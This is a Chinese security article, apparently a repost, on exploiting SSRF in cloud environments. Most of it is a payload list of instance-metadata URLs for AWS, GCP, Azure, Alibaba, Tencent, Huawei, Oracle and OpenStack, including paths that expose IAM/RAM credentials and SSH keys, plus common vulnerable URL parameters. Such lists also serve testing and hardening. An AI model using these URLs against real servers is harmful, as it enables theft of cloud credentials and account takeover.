由于云厂商提供云服务均使用同一套网络边界和鉴权系统,且各云组件默认相互信任。此时一旦存在SSRF漏洞,此类边界将不复存在,攻击者可直接调用云厂商支持环境中的相应接口,因此SSRF漏洞在云环境中更具有危害性。以下文章围绕ssrf的云上利用展开。
文章作者:奇安信攻防社区(中铁13层打工人)
文章来源:https://forum.butian.net/share/2412
1►
漏洞概述
2►
漏洞实例-SSRF读取TX元数据
3►
SSRF读取阿里云元数据
4►
加固与防御
5►
拓展
1、AWS( http://169.254.169.254/latest/meta-data/)
http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE
NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE
NAME]
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key
https://cloud.google.com/compute/docs/metadata
Requires the
header "Metadata-Flavor: Google" or "X-Google-Metadata-Request:
True" on API v1
http://169.254.169.254/computeMetadata/v1/
http://metadata.google.internal/computeMetadata/v1/
http://metadata/computeMetadata/v1/
http://metadata.google.internal/computeMetadata/v1/instance/hostname
http://metadata.google.internal/computeMetadata/v1/instance/id
http://metadata.google.internal/computeMetadata/v1/project/project-id
https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service
Header:
"Metadata: true"
(Old)
https://azure.microsoft.com/en-us/blog/what-just-happened-to-my-vm-in-vm-metadata-service/
http://169.254.169.254/metadata/instance?api-version=2017-04-02
http://169.254.169.254/metadata/instance/network/interface/0/ipv4/ipAddress/0/publicIpAddress?api-version=2017-04-02&format=text
https://docs.us-phoenix-1.oraclecloud.com/Content/Compute/Tasks/gettingmetadata.htm
http://169.254.169.254/opc/v1/instance/
https://docs.oracle.com/en/cloud/iaas/compute-iaas-cloud/stcsg/retrieving-instance-metadata.html
http://192.0.0.192/latest/
http://192.0.0.192/latest/user-data/
http://192.0.0.192/latest/meta-data/
http://192.0.0.192/latest/attributes/
https://help.aliyun.com/zh/ecs/user-guide/view-instance-metadata
http://100.100.100.200/latest/meta-data/[metadata](http://100.100.100.200/latest/meta-data/%3cmetadata)
http://100.100.100.200/latest/meta-data/instance-id
http://100.100.100.200/latest/meta-data/ram/security-credentials/
http://100.100.100.200/latest/meta-data/ram/security-credentials/huocorp-terraform-goat-role
https://cloud.tencent.com/document/product/213/4934
http://metadata.tencentyun.com/latest/meta-data/
http://169.254.0.23/latest/meta-data/
http://100.88.222.5/
https://support.huaweicloud.com/usermanual-ecs/ecs_03_0166.html
http://169.254.169.254/openstack/latest/meta_data.json
http://169.254.169.254/openstack/latest/user_data
http://169.254.169.254/openstack/latest/network_data.json
http://169.254.169.254/openstack/latest/securitykey
二、ssrf挖掘常见场景、参数
常见场景:
http://share.xxx.com/index.php?url=http://www.xxx.com
http://image.xxx.com/image.php?image=http://www.xxx.com
常见参数:
share、wap、url、link、src、source、target、u、3g、display、sourceURl、imageURL、domin
黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担!
如侵权请私聊我们删文
END
原文始发于微信公众号(黑白之道):云上的ssrf利用
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论